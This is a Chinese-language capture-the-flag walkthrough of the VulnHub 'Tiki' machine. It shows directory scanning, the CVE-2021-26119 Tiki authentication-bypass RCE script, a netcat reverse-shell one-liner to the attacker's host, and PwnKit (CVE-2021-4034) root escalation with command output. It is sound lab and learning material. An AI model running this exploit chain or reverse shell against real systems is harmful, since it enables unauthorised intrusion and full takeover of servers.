vulnhub-Tiki

Date: 07/14/2022
Difficulty: Easy
Tags: CVE-2021-26119, CVE-2021-4034, Tiki CMS, sudo -l

https://www.vulnhub.com/entry/tiki_1,525/

信息搜集

端口扫描

目录扫描

➜  ~ dirsearch -u http://192.168.31.138
[06:15:28] Starting:
[06:15:30] 403 -  279B  - /.ht_wsr.txt
[06:15:30] 403 -  279B  - /.htaccess.orig
[06:15:30] 403 -  279B  - /.htaccess.bak1
[06:15:30] 403 -  279B  - /.htaccessBAK
[06:15:30] 403 -  279B  - /.htaccess_sc
[06:15:30] 403 -  279B  - /.htaccess.save
[06:15:30] 403 -  279B  - /.htaccess.sample
[06:15:30] 403 -  279B  - /.htaccessOLD
[06:15:30] 403 -  279B  - /.htaccess_orig
[06:15:30] 403 -  279B  - /.htaccessOLD2
[06:15:30] 403 -  279B  - /.html
[06:15:30] 403 -  279B  - /.htpasswds
[06:15:30] 403 -  279B  - /.htm
[06:15:30] 403 -  279B  - /.htpasswd_test
[06:15:30] 403 -  279B  - /.httr-oauth
[06:15:31] 403 -  279B  - /.php
[06:15:31] 403 -  279B  - /.htaccess_extra
[06:15:59] 200 -   11KB - /index.html
[06:16:11] 200 -   42B  - /robots.txt
[06:16:11] 403 -  279B  - /server-status
[06:16:11] 403 -  279B  - /server-status/
[06:16:16] 200 -  526B  - /tiki/doc/stable.version

在 robots.txt 中扫出

加上再次扫描得到版本信息

http://192.168.31.138/tiki/changelog.txt

方法一

2022年tiki cms 出了新的漏洞,所以能一键利用了

https://srcincite.io/pocs/cve-2021-26119.py.txt

验证

➜  Tiki python3 exp.py  192.168.31.138 /tiki id
(+) blanking password...
(+) admin password blanked!
(+) getting a session...
(+) auth bypass successful!
(+) triggering rce...uid=33(www-data) gid=33(www-data) groups=33(www-data)

反弹shell

➜  Tiki python3 exp.py  192.168.31.138 /tiki "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.31.134 1234 >/tmp/f"
(+) blanking password...
(+) admin password blanked!
(+) getting a session...
(+) auth bypass successful!
(+) triggering rce...

提权

git clone https://github.com/berdav/CVE-2021-4034.gitpython3 -m http.server 80
wget 192.168.31.134/cve-2021-4034.c
wget 192.168.31.134/Makefile
wget 192.168.31.134/pwnkit.c
wget 192.168.31.134/pwnkit.so

www-data@ubuntu:/tmp$ make
make
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
www-data@ubuntu:/tmp$ ls
lsCVE-2021-4034.git   cve-2021-4034     gconv-modules   pwnkit.so
'GCONV_PATH=.'       cve-2021-4034.c   linpeas.sh      pwnkit.so.1Makefile            f                 pwnkit.c
www-data@ubuntu:/tmp$ ./cve-2021-4034
./cve-2021-4034
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

方法二

➜  ~ searchsploit tiki 21
----------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title                                                                                       |  Path
----------------------------------------------------------------------------------------------------- ---------------------------------
Tiki Wiki CMS Groupware 21.1 - Authentication Bypass                                                 | php/webapps/48927.py
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

跑脚本,burp登录后使用 cookie 在网页登录得到账号密码

sudo su 得到 root

vulnhub-Tiki - 类oscp靶机攻略1相关推荐

  1. 漏洞payload 靶机_hackme:2 靶机攻略

    原标题:hackme:2 靶机攻略 0x01 背景: hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中.内容丰富,贴近实战.而且没有太多的脑洞,适合安全工作者们用来练习渗 ...

  2. Hack Me Please靶机攻略

    hack me please靶机攻略 首先进行主机发现 信息收集 扫描开放的端口 nmap -p- -sS -O -sV -sC -A -T4 192.168.237.197 -oN nmap.A 访 ...

  3. OSCP 2021攻略之旅--从小白到通过

    1.背景 本文提供给0基础小白,指导其如何学习通过OSCP. 本人CS硕士毕业,毕业后加入一家网络安全公司一直做传统网络安全产品研发工作(FW/IDS/IPS/WAF/scanner).现任谋厂研究员 ...

  4. delphi添加类文件_SpringBoot攻略三、配置文件说明

    自动配置 SpringBoot启动的时候加载主配置类(@SpringBootApplication注解修饰), @SpringBootApplication开启了自动配置功能 @EnableAutoC ...

  5. iOS 直播类,交友类,陪玩类 app 上架攻略

    昨天,我发了一篇关于社交app的吐槽分享,今天上午就有位做陪玩类的开发者来跟我聊最近这段时间陪玩,直播,交友类app的趋势.他也很热心,将自己去年的陪玩app上架应用商店的经历分享给我,经过他的同意, ...

  6. 社交娱乐类APP出海攻略

    据数据研究机构艾瑞咨询发布的<2022年移动应用出海趋势洞察白皮书>显示,中国娱乐类APP出海呈现井喷式收入增长,仅2021年,中国娱乐类应用软件出海收入就增长了204%.如此广阔向好的出 ...

  7. 饥荒怎么修改创建好的服务器,联机版饥荒创建世界后怎么再次修改设置 | 手游网游页游攻略大全...

    发布时间:2016-02-15 存档保存位置是?很多玩家对此并不是很了解,不过别着急哟,下面99单机小编就为你带来高玩分享的相关技巧心得攻略,希望大家能喜欢. 联机版的存档与单机版是不同的,由于联机版 ...

  8. Vulnhub靶机Wakanda渗透测试攻略

    前言 Wakanda是一个新的交易市场网站,很快会上线了.你的目标是通过黑客技术找到"振金"的确切位置. 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnh ...

  9. Java虚拟机调用jni_JNI攻略之十一――启动虚拟机调用java类

    JNI攻略之十一――启动虚拟机调用java类 江苏无锡缪小东 一.一个简单的java程序 下面是一个简单的java程序!主要是供虚拟机直接调用的!我们可以编写任意的java程序,然后在c中调用虚拟机执 ...

  10. Dataset:fetch_20newsgroups(20类新闻文本)数据集的简介、安装、使用方法之详细攻略

    Dataset:fetch_20newsgroups(20类新闻文本)数据集的简介.安装.使用方法之详细攻略 目录 fetch_20newsgroups(20类新闻文本)数据集的简介 1.数据集信息 ...

最新文章

  1. 冒泡排序算法_PHP冒泡排序算法(一)
  2. poj3111 选取物品(二分+贪心)
  3. mysql 宽容模式_SELinux 宽容模式(permissive) 强制模式(enforcing) 关闭(disabled)
  4. python-opencv实现简单的车牌定位
  5. python的shutil模块是内置的_python内置模块~shutil
  6. 如何用 NAS 搭建属于自己的云端书库 | 极客分享第 32 期
  7. Android 开发 DNK开发将.c文件打包成os
  8. 实现Web前端 live2dw小人物的显示
  9. SEO关键词之选取策略及具体方法
  10. Ubuntu 编译ijkplayer 支持几乎所有格式(MP4,mov,mkv,avi,wmv,m4v,mpg,webm,ogv,3g2.flv,f4v,swf)和https
  11. 游戏编程笔记-起步(一)一个简单的游戏-贪吃蛇
  12. 清除H5的浏览器缓存
  13. 基于ZigBee的出租车调度系统
  14. 两条命令让你的git轻松自动变基,学到了!
  15. Vue中的@blur事件
  16. Linux 驱动开发 三:字符设备驱动框架
  17. 基于Web的系统测试方法(张友生(来自中国系统分析师/中国系统分析员))
  18. Oracle分页查询的两种方法
  19. 报错“未能创建类型‘xxx’
  20. 佛山科学技术学院计算机期末试题,高等数学 A佛山科学技术学院期终考试试题.doc...

热门文章

  1. 有关51单片机串口通信点灯的问题
  2. C语言求绝对值的问题
  3. centos安装net-speeder
  4. Nuc做文件服务器,Intel NUC 安装Windows Server 2016 图解教程
  5. 十二存单法 和 阶梯存款法
  6. 安装DevExpress后如何在工具箱显示Dev控件
  7. 学员管理系统(面向对象版)
  8. (JDBC四)JDBC实例(b)
  9. OSChina 周六乱弹 ——论单身的11大好处
  10. 别让just do it 误导了你